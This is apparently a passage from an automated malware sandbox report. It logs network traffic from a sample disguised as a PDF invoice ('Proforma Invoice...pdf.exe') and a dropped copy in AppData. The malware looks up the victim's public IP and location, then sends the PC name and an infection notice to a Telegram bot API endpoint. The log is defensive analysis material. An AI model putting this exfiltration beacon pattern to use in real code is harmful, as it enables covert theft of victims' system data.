                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.82</body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          14192.168.2.449765193.122.130.0807364C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 17, 2024 09:44:48.674422979 CEST127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          15192.168.2.449766193.122.130.0807364C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 17, 2024 09:44:48.687974930 CEST151OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Connection: Keep-Alive


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          16192.168.2.449767193.122.130.0807364C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 17, 2024 09:44:48.701416016 CEST151OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Connection: Keep-Alive


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          17192.168.2.449768193.122.130.0807364C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 17, 2024 09:44:48.712449074 CEST151OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Connection: Keep-Alive


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          18192.168.2.449769193.122.130.0807364C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 17, 2024 09:44:48.728034019 CEST151OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Connection: Keep-Alive


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          19192.168.2.449770193.122.130.0807364C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 17, 2024 09:44:48.768398046 CEST151OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Connection: Keep-Alive


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          20192.168.2.449771193.122.130.0807364C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 17, 2024 09:44:48.782608032 CEST151OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Connection: Keep-Alive
                                                                                          Oct 17, 2024 09:44:49.437829971 CEST323INHTTP/1.1 200 OK
                                                                                          Date: Thu, 17 Oct 2024 07:44:49 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 106
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          X-Request-ID: f5b48c90ecbe21837b0b380867a85604
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.82</body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          21192.168.2.449774193.122.130.0807364C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 17, 2024 09:44:50.204370022 CEST127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          22192.168.2.449775193.122.130.0807364C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 17, 2024 09:44:50.212238073 CEST127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          23192.168.2.449776193.122.130.0807364C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 17, 2024 09:44:50.227319002 CEST127OUTGET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Oct 17, 2024 09:44:50.910689116 CEST323INHTTP/1.1 200 OK
                                                                                          Date: Thu, 17 Oct 2024 07:44:50 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 106
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          X-Request-ID: f8c70781179f07d272d697d59e1fcb30
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.82</body></html>


                                                                                          HTTPS Proxied Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.449740188.114.96.34438080C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-17 07:44:42 UTC87OUTGET /xml/173.254.250.82 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          Connection: Keep-Alive
                                                                                          2024-10-17 07:44:43 UTC708INHTTP/1.1 200 OK
                                                                                          Date: Thu, 17 Oct 2024 07:44:42 GMT
                                                                                          Content-Type: application/xml
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          access-control-allow-origin: *
                                                                                          vary: Accept-Encoding
                                                                                          Cache-Control: max-age=86400
                                                                                          CF-Cache-Status: HIT
                                                                                          Age: 11561
                                                                                          Last-Modified: Thu, 17 Oct 2024 04:32:01 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=asp7407ZkOZGK1sMKUBdE6aL7dPq6JdAaKTQDksDhpFnexcQGsay96byoB%2BxV7zDFhd2PLqMpHkVole2BIZJusMl8B%2Fop9nFqRAWSAiofCvj7zQ%2B5ug%2FFT6m1U8IeCTZXOyQreA9"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8d3eaa3c5bda6c1a-DFW
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          2024-10-17 07:44:43 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                          Data Ascii: 167<Response><IP>173.254.250.82</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                          2024-10-17 07:44:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.449745188.114.96.34438080C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-17 07:44:44 UTC63OUTGET /xml/173.254.250.82 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          2024-10-17 07:44:44 UTC710INHTTP/1.1 200 OK
                                                                                          Date: Thu, 17 Oct 2024 07:44:44 GMT
                                                                                          Content-Type: application/xml
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          access-control-allow-origin: *
                                                                                          vary: Accept-Encoding
                                                                                          Cache-Control: max-age=86400
                                                                                          CF-Cache-Status: HIT
                                                                                          Age: 11563
                                                                                          Last-Modified: Thu, 17 Oct 2024 04:32:01 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t8%2Bdx5r4owQS%2BMp5F7a0hmb1%2FDOqVbdFvJeaz8LxQm%2B91K53QD9uMoTXGBeSxASFdoMyvtuiGQcFSU%2Bwdho6dKQrBMjrKb2JB5poqdOr0DIMSwecfDdPn6tUfvYvpW2M003ZqIKo"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8d3eaa44f8d34782-DFW
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          2024-10-17 07:44:44 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                          Data Ascii: 167<Response><IP>173.254.250.82</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                          2024-10-17 07:44:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          2192.168.2.449749188.114.96.34438080C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-17 07:44:45 UTC63OUTGET /xml/173.254.250.82 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          2024-10-17 07:44:45 UTC712INHTTP/1.1 200 OK
                                                                                          Date: Thu, 17 Oct 2024 07:44:45 GMT
                                                                                          Content-Type: application/xml
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          access-control-allow-origin: *
                                                                                          vary: Accept-Encoding
                                                                                          Cache-Control: max-age=86400
                                                                                          CF-Cache-Status: HIT
                                                                                          Age: 11564
                                                                                          Last-Modified: Thu, 17 Oct 2024 04:32:01 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FPI%2F1YV2T43zx1ro%2BotuNF41kCH1bZ%2F67WxKDVihpYa7xB0%2Ba1dgYOtWbc97cI0GnDEQzWbyr9qTXnQUceA%2FpLcJDO2djHnrmBWz1jECO5A8aunMWEWfpr8UAc7KaQK99LkepIE%2F"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8d3eaa4e38c06bf6-DFW
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          2024-10-17 07:44:45 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                          Data Ascii: 167<Response><IP>173.254.250.82</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                          2024-10-17 07:44:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          3192.168.2.449760188.114.96.34437364C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-17 07:44:46 UTC87OUTGET /xml/173.254.250.82 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          Connection: Keep-Alive
                                                                                          2024-10-17 07:44:46 UTC706INHTTP/1.1 200 OK
                                                                                          Date: Thu, 17 Oct 2024 07:44:46 GMT
                                                                                          Content-Type: application/xml
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          access-control-allow-origin: *
                                                                                          vary: Accept-Encoding
                                                                                          Cache-Control: max-age=86400
                                                                                          CF-Cache-Status: HIT
                                                                                          Age: 11565
                                                                                          Last-Modified: Thu, 17 Oct 2024 04:32:01 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V%2F5babQv6Z4%2F6uuoeCOxVhJ0wxHvv1Ai%2FRaCLH1hsXRvfUu4zwt8582gHWmxtYevLH95MYFxAeIDQu5PxONoKYkb5ytaeTgjpcEIYsU7sDxCEDJd9c9Tai4xbAOf0Y6LpN0Ii9lE"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8d3eaa54df283ad3-DFW
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          2024-10-17 07:44:46 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                          Data Ascii: 167<Response><IP>173.254.250.82</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                          2024-10-17 07:44:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          4192.168.2.449759149.154.167.2204438080C:\Users\user\Desktop\Proforma Invoice_21-1541 And Packing List.pdf.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-17 07:44:46 UTC334OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226533%0D%0ADate%20and%20Time:%2017/10/2024%20/%2007:24:17%0D%0ACountry%20Name:%20%0D%0A%5B%20226533%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                          Host: api.telegram.org
                                                                                          Connection: Keep-Alive
                                                                                          2024-10-17 07:44:47 UTC344INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.18.0
                                                                                          Date: Thu, 17 Oct 2024 07:44:46 GMT
                                                                                          Content-Type: application/json
                                                                                          Content-Length: 55
                                                                                          Connection: close
                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                          2024-10-17 07:44:47 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          5192.168.2.449761188.114.96.34437364C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-17 07:44:47 UTC63OUTGET /xml/173.254.250.82 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          2024-10-17 07:44:47 UTC706INHTTP/1.1 200 OK
                                                                                          Date: Thu, 17 Oct 2024 07:44:47 GMT
                                                                                          Content-Type: application/xml
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          access-control-allow-origin: *
                                                                                          vary: Accept-Encoding
                                                                                          Cache-Control: max-age=86400
                                                                                          CF-Cache-Status: HIT
                                                                                          Age: 11566
                                                                                          Last-Modified: Thu, 17 Oct 2024 04:32:01 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z7yPjI8Eaizuw82YgC85N9haMFC4zcGX2yw9hZ1j9Dn4KzmAUBG2yDCBwMvdmfpFTCioU80bqqMFuuXxydnO%2B%2BxSCGMc7G3GLQTZlBaGDmIjxxXKbGkSnanypDiPjGbtujwNDRl%2F"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8d3eaa5acfe8486d-DFW
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          2024-10-17 07:44:47 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                          Data Ascii: 167<Response><IP>173.254.250.82</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                          2024-10-17 07:44:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          6192.168.2.449772188.114.96.34437364C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-17 07:44:50 UTC63OUTGET /xml/173.254.250.82 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          2024-10-17 07:44:50 UTC716INHTTP/1.1 200 OK
                                                                                          Date: Thu, 17 Oct 2024 07:44:50 GMT
                                                                                          Content-Type: application/xml
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          access-control-allow-origin: *
                                                                                          vary: Accept-Encoding
                                                                                          Cache-Control: max-age=86400
                                                                                          CF-Cache-Status: HIT
                                                                                          Age: 11569
                                                                                          Last-Modified: Thu, 17 Oct 2024 04:32:01 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=47O1dUHm%2B%2FIuS2tu%2FMauLTVgA9n193GavC9%2FESZRmeRB7C5KB06dY6cBe9YBNhq3cdijm5EBuRvWsgX1DjRR5Ecbbqbjny%2FQ9Bu%2B%2F13GlxLStZ58fDNumhctF0G2%2B56OSOQ62jCZ"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8d3eaa693b576b22-DFW
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          2024-10-17 07:44:50 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                          Data Ascii: 167<Response><IP>173.254.250.82</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                          2024-10-17 07:44:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          7192.168.2.449777188.114.96.34437364C:\Users\user\AppData\Roaming\vrhZELiHpiub.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-10-17 07:44:51 UTC63OUTGET /xml/173.254.250.82 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          2024-10-17 07:44:51 UTC704INHTTP/1.1 200 OK
                                                                                          Date: Thu, 17 Oct 2024 07:44:51 GMT
                                                                                          Content-Type: application/xml
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          access-control-allow-origin: *
                                                                                          vary: Accept-Encoding
                                                                                          Cache-Control: max-age=86400
                                                                                          CF-Cache-Status: HIT
                                                                                          Age: 11570
                                                                                          Last-Modified: Thu, 17 Oct 2024 04:32:01 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OiQveHSt4fzhiXeIVaFNjtyiWwXxpYgjIs4aFZAW15ZQDYyTgboodxpKOBlkn%2BfJP81mzRXxs4yppxg7sRgOP0Pvmdw30To96iCc3WCGKLwX6OiopCam4xmVxV6%2FIcfMVfuhkJbg"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8d3eaa727aaceaa0-DFW
                                                                                          alt-svc: h3=":443"; ma=86400
